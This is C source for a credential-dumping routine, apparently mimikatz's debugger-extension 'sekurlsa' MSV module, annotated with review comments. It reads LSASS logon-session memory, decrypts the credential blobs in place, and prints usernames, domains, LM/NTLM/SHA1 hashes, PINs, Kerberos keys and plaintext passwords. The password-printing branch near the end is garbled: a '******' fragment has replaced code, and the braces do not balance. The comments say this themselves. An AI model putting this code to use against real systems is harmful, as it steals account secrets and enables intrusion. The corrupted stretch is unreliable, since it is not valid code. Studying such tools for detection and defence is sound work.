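/*
 * Logon-session callback for the MSV1_0 package.
 *
 * Walks the debuggee's KIWI_MSV1_0_CREDENTIALS list hanging off
 * pData->pCredentials via the debugger's ReadMemory(), and for each
 * KIWI_MSV1_0_PRIMARY_CREDENTIALS entry copies the ANSI "Primary" tag and
 * the credential blob into local buffers (kull_m_string_getDbgUnicodeString)
 * before handing the blob to kuhl_m_sekurlsa_genericCredsOutput for
 * decryption and display.
 *
 * reserved  unused.
 * pData     logon session being enumerated; only pCredentials and LogonId
 *           are read here.
 *
 * Both lists are singly linked through ->next and end with NULL.
 *
 * Fix: a failed ReadMemory() now ends the walk. Previously the outer loop
 * never advanced pCreds on failure (it re-read the same address forever,
 * printing "KO" each time) and the inner loop followed ->next from a
 * structure that had not been filled in (uninitialised on the first
 * iteration, stale afterwards).
 */
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
	KIWI_MSV1_0_CREDENTIALS credentials;
	KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
	ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pData->pCredentials;
	DWORD flags = 0;

	while(pCreds)
	{
		if(!ReadMemory(pCreds, &credentials, sizeof(KIWI_MSV1_0_CREDENTIALS), NULL))
		{
			dprintf("n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)");
			break; /* credentials.next is not valid: cannot advance, so stop */
		}

		for(pPrimary = (ULONG_PTR) credentials.PrimaryCredentials; pPrimary; pPrimary = (ULONG_PTR) primaryCredentials.next)
		{
			if(!ReadMemory(pPrimary, &primaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), NULL))
			{
				dprintf("n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
				break; /* primaryCredentials.next is stale or uninitialised here */
			}

			/* Credentials.Buffer now points at a local copy of the (still encrypted) blob. */
			if(kull_m_string_getDbgUnicodeString(&primaryCredentials.Credentials))
			{
				if(kull_m_string_getDbgUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary))
				{
					dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);

					/* The ANSI "Primary" tag selects how the blob is parsed; the
					   "Primary" layout differs from Windows 10 onwards. Unknown
					   tags get flags = 0, i.e. a raw hex dump downstream. */
					if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
						flags = (NtBuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
					else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
						flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
					else
						flags = 0;

					kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
					LocalFree(primaryCredentials.Primary.Buffer);
				}

				/* genericCredsOutput decrypts the blob in place (LsaUnprotectMemory),
				   so the local copy now holds plaintext hashes/keys. Wipe it before
				   freeing instead of leaving secrets in the debugger's freed heap. */
				if(primaryCredentials.Credentials.Buffer)
					SecureZeroMemory(primaryCredentials.Credentials.Buffer, primaryCredentials.Credentials.Length);
				LocalFree(primaryCredentials.Credentials.Buffer);
			}
		}

		pCreds = (ULONG_PTR) credentials.next;
	}
}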
/*
 * Decrypts (unless KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT) and prints one
 * credential structure that the caller has already copied out of the
 * debuggee, dispatching on flags:
 *
 *   CREDENTIAL  - mesCreds is a UNICODE_STRING holding a typed blob; the
 *                 low bits (CREDENTIAL_MASK) select PRIMARY (MSV1_0 user /
 *                 domain / LM / NTLM / SHA1), CREDENTIALKEY (marshalled key
 *                 list) or a raw hex dump.
 *   PINCODE     - the UserName field carries a PIN.
 *   KEY_LIST    - mesCreds is really a KERB_HASHPASSWORD_6 whose Checksump
 *                 is fetched from the target and printed as hex.
 *   otherwise   - a UserName / Domaine / Password triple (DOMAIN swaps the
 *                 first two; LINE prints tab-separated; WPASSONLY skips
 *                 entries without a password).
 *
 * mesCreds  credential structure (interpretation depends on flags); NULL
 *           prints "LUID KO".
 * luid      accepted for the callback signature but not referenced in this
 *           body.
 * flags     KUHL_SEKURLSA_CREDS_DISPLAY_* selector bits.
 *
 * Every decryption is done in place on the local copy, so after this
 * function the buffers contain plaintext secrets; the branches below free
 * them with LocalFree() without wiping them first.
 *
 * NOTE(review): this copy of the file is corrupted in the username/domain/
 * password branch near the end (the "******" fragment is not valid C and
 * the dprintf argument list plus the condition choosing between the %.*S,
 * %wZ and hex outputs are missing). Restore that stretch from upstream
 * before building; nothing here attempts to reconstruct it.
 */
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
{
	PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
	PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
	PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
	PKERB_HASHPASSWORD_6 pHashPassword;
	UNICODE_STRING buffer;
	PVOID base;
	DWORD type, i;

	if(mesCreds)
	{
		if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
		{
			type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
			credentials = (PUNICODE_STRING) mesCreds;
			if(credentials->Buffer)
			{
				/* In-place decryption of the blob. NOTE(review): this branch
				   decrypts Length bytes while the PINCODE/password branches
				   below use MaximumLength - confirm which one the helper
				   expects, the two are not interchangeable for block ciphers. */
				if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
					kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);

				/* NOTE(review): the MSV callback passes
				   KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 on Windows 10+, but
				   there is no case for it here, so unless that constant aliases
				   PRIMARY the Win10 "Primary" blob falls to the raw-hex default. */
				switch(type)
				{
				case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
					pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
					/* presumably turns the relative string offsets stored in the
					   blob into absolute pointers into the local copy - confirm. */
					kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
					kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
					dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
					/* Each hash is printed only when its presence flag is set. */
					if(pPrimaryCreds->isLmOwfPassword)
					{
						dprintf("\n\t * LM : ");
						kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
					}
					if(pPrimaryCreds->isNtOwfPassword)
					{
						dprintf("\n\t * NTLM : ");
						kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
					}
					if(pPrimaryCreds->isShaOwPassword)
					{
						dprintf("\n\t * SHA1 : ");
						kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
					}
					break;

				case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
					pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
					/* base = first byte after the header and its unk0 MARSHALL_KEY
					   entries; the key helper advances it as it consumes data.
					   NOTE(review): unk0 comes from the (target-supplied) blob and
					   is never compared with credentials->Length, so a corrupt or
					   hostile count walks past the local copy; unk0 == 0 also makes
					   (unk0 - 1) wrap, although the loop then does not run. */
					base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
					for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
						kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
					break;

				default:
					/* Unknown blob type: dump it as-is. */
					dprintf("\n\t * Raw data : ");
					kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1);
				}
			}
		}
		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
		{
			/* The PIN travels in the UserName field; it is fetched from the
			   target, decrypted in place, printed, then freed unwiped. */
			if(mesCreds->UserName.Buffer)
			{
				if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
					dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName);
					LocalFree(mesCreds->UserName.Buffer);
				}
			}
		}
		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
		{
			/* Kerberos key-list entry: etype name, then the checksum bytes. */
			pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds;
			dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
			/* Assignment in the condition is intentional: a zero Size means the
			   entry is unusable. NOTE(review): Size is truncated to USHORT here
			   without a range check. */
			if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
			{
				/* Checksump is presumably a target-side address; the helper
				   replaces it with a local copy - confirm. */
				buffer.Buffer = (PWSTR) pHashPassword->Checksump;
				if(kull_m_string_getDbgUnicodeString(&buffer))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength);
					kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0);
					LocalFree(buffer.Buffer);
				}
			}
			else dprintf("<no size, buffer is incorrect>");
		}
		else
		{
			/* Generic user / domain / password triple. */
			if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
			{
				/* Username and domain are only accepted when they look like
				   printable UNICODE_STRINGs; DOMAIN swaps the two fields. */
				if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
						username = &mesCreds->UserName;
					else
						domain = &mesCreds->UserName;
				}
				if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
						domain = &mesCreds->Domaine;
					else
						username = &mesCreds->Domaine;
				}
				/* The password is taken whenever it can be read (the
				   plausibility check stays commented out) and decrypted in place. */
				if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/)
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength);
					password = &mesCreds->Password;
				}
				if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY))
				{
					/* NOTE(review): CORRUPTED IN THIS COPY. The text between the
					   "Password : " literal and the "%.*S" literal has been replaced
					   by "******"; the username/domain arguments of this dprintf
					   and the if(...) { that opens the %.*S / %wZ / hex selection
					   are gone, which is why a bare "else" follows. Do not build
					   from this file; recover the stretch from upstream. Also note
					   the hex fallback below dereferences password without a NULL
					   check. */
					dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? "%wZ\t%wZ\t" : "\n\t * Username : %wZ" "\n\t * Domain : %wZ" "\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer);
					else dprintf("%wZ", password ? password : &uNull);
				}
				else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
			}
			/* Local copies (plaintext after decryption) are released unwiped. */
			LocalFree(mesCreds->UserName.Buffer);
			LocalFree(mesCreds->Domaine.Buffer);
			LocalFree(mesCreds->Password.Buffer);
		}
	}
	if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE)
		dprintf("\n");
	}
	else dprintf("LUID KO\n");
}